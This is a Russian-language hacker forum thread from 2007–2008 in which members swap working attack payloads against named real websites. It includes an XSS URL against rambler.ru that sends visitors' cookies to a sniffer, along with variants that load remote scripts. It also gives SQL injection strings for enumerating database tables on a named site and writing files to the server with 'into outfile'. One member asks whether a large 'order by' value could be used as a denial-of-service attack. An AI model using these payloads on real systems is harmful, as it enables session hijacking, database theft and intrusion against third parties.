Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145
    для рамблера:

    Code:
    http://www.rambler.ru/db/support/feedback.shtml?name=<IMG%20SRC=javascript:location.href='адрес_снифера'%2bdocument.cookie>
     
  2. Macro

    Macro Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    552
    Likes Received:
    298
    Reputations:
    207
    А еще лучше
    http://www.rambler.ru/db/support/feedback.shtml?name=<script src=http://[путь к файлу с яваскриптом]></script>

    либо

    http://www.rambler.ru/db/support/feedback.shtml?name=<script>eval(unescape([тут эскейпенный код]))</script>
     
  3. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    Короче, набросал на скорую руку снифер, нормально куки пришли с рамблера :)
     
  4. frigid20

    frigid20 Member

    Joined:
    19 Jan 2008
    Messages:
    19
    Likes Received:
    6
    Reputations:
    5
    респект! работает
     
  5. frigid20

    frigid20 Member

    Joined:
    19 Jan 2008
    Messages:
    19
    Likes Received:
    6
    Reputations:
    5
    а с яндексом как? не могу чето ему целку вскрыть....
     
  6. Macro

    Macro Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    552
    Likes Received:
    298
    Reputations:
    207
    Так, как я написал про рамблер... Точно так же сработает
     
  7. frigid20

    frigid20 Member

    Joined:
    19 Jan 2008
    Messages:
    19
    Likes Received:
    6
    Reputations:
    5
    но как я туда вставлю ссылку на сниффер? он ведь картинкой! а если я просто путь вставлю то кукисы не придут точнее придут но не кукисы а так мусор
     
  8. Macro

    Macro Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    552
    Likes Received:
    298
    Reputations:
    207
    Ссылку не на сниффер, а на файл, в котором код, отправляющий куки на сниффер
     
  9. frigid20

    frigid20 Member

    Joined:
    19 Jan 2008
    Messages:
    19
    Likes Received:
    6
    Reputations:
    5
    мм... я пока плохо разбираюсь в этом( а какой должен быть код в файле?
     
  10. PunkAss

    PunkAss New Member

    Joined:
    19 Jan 2008
    Messages:
    9
    Likes Received:
    1
    Reputations:
    5
    отлично, спс :) а можно этот запрос составить так, чтобы узнать какие ещё есть таблицы, а то тут только селект по одной таблице получается...
     
  11. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    Хм, тут нарисовалась трабла. Я проводил скулю на сайтенге, и при -1 union select 1/*
    выдается ошибка The used SELECT statements have a different number of columns, хотя order by показывает что полей именно 1, но это не важно, я начал работать с подзапросами и при -1 union select 1 from users/* вылезла ошибка Table 'dk.users' doesn't exist а при запросе -1 union select 1 from information_schema.tables почему то опять же вылезла The used SELECT statements have a different number of columns Значит ли это что information_schema.tables существует и к ней есть доступ ?
     
  12. Basurman

    Basurman Elder - Старейшина

    Joined:
    10 Nov 2006
    Messages:
    363
    Likes Received:
    271
    Reputations:
    29
    Да. доступ к таблице есть.
    Запросов может быть несколько.
    пробуй union select 1,2/* и тд. пока не попадешь на праильное кол-во колонок
     
    4 people like this.
  13. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    А разве если бы кол-во колонок было неверное мне бы выпадало Table 'dk.users' doesn't exist ?
    А, все, пасиб Basurman
    Подбирать поля - лень, я нашел более удобную скулю на этом же сайте, доступ к information_schema действительно существует =) Еще раз всем пасиб
     
    #773 0nep@t0p, 21 Jan 2008
    Last edited: 21 Jan 2008
  14. Basurman

    Basurman Elder - Старейшина

    Joined:
    10 Nov 2006
    Messages:
    363
    Likes Received:
    271
    Reputations:
    29
    да. именно так и происходит
     
  15. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    вот смотри:
    Code:
    http://cleverclub.nashe.ru/rating_d.asp?sender=1'/**/or/**/cast((SELECT/**/TOP/**/1/**/table_name/**/From/**/information_schema.tables/**/where/**/table_name/**/not/**/in/**/('Rating1','HelpMessage'))/**/as/**/int)='1
    в скобки, которые после not in подставляй очередное полученное имя таблицы и таким образом перебирай имена всех таблиц, а вобще почитай вот эту статью: Провидение Иньекций в MSSQL сервер от Microsoft
     
    1 person likes this.
  16. PunkAss

    PunkAss New Member

    Joined:
    19 Jan 2008
    Messages:
    9
    Likes Received:
    1
    Reputations:
    5
    можно было просто тыкнуть в статью, я её не читал :D пасиба, вопрос закрыт.
     
  17. frigid20

    frigid20 Member

    Joined:
    19 Jan 2008
    Messages:
    19
    Likes Received:
    6
    Reputations:
    5
    я подобрал количество колонок но нет полей для вывода как поступать?
     
    1 person likes this.
  18. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    брутить посимвольно.
     
    _________________________
  19. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    Если известен путь к папке с правами на запись и видной из веба, попробуй записать в файл
    -1 union select 1,2,...,n from some_table into outfile "/path/www/file.txt"/*


    blackybr: + from
     
    #779 AFoST, 23 Jan 2008
    Last edited: 23 Jan 2008
  20. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    Короче искал инъекцию,а нашел интересную уязвимость,дело в том что я сижу с телефона,и браузер опера мини(java) при загрузке объемных страниц ,разбивает их на несколько(в зависимости от веса,картинок,и т.д),так вот при составлении запроса на sql инъекцию таким образом: http//site.ru/?item=1+order+by+100/*,страница из скажем 15кб разрослась до 1500кб,тоесть просто размножился текст в 100 раз,и при этом выдало такую ошибку:pHP Fatal error: Maximum execution time of 60 seconds exceeded in E:\xxx.ru\wwwroot\lost\index.php on line 287.

    Вопрос такой:с чем это связано и значит ли что если я увеличу число в запросе,к примеру до 1000000,то получится типа ддос атаки?
     
Thread Status:
Not open for further replies.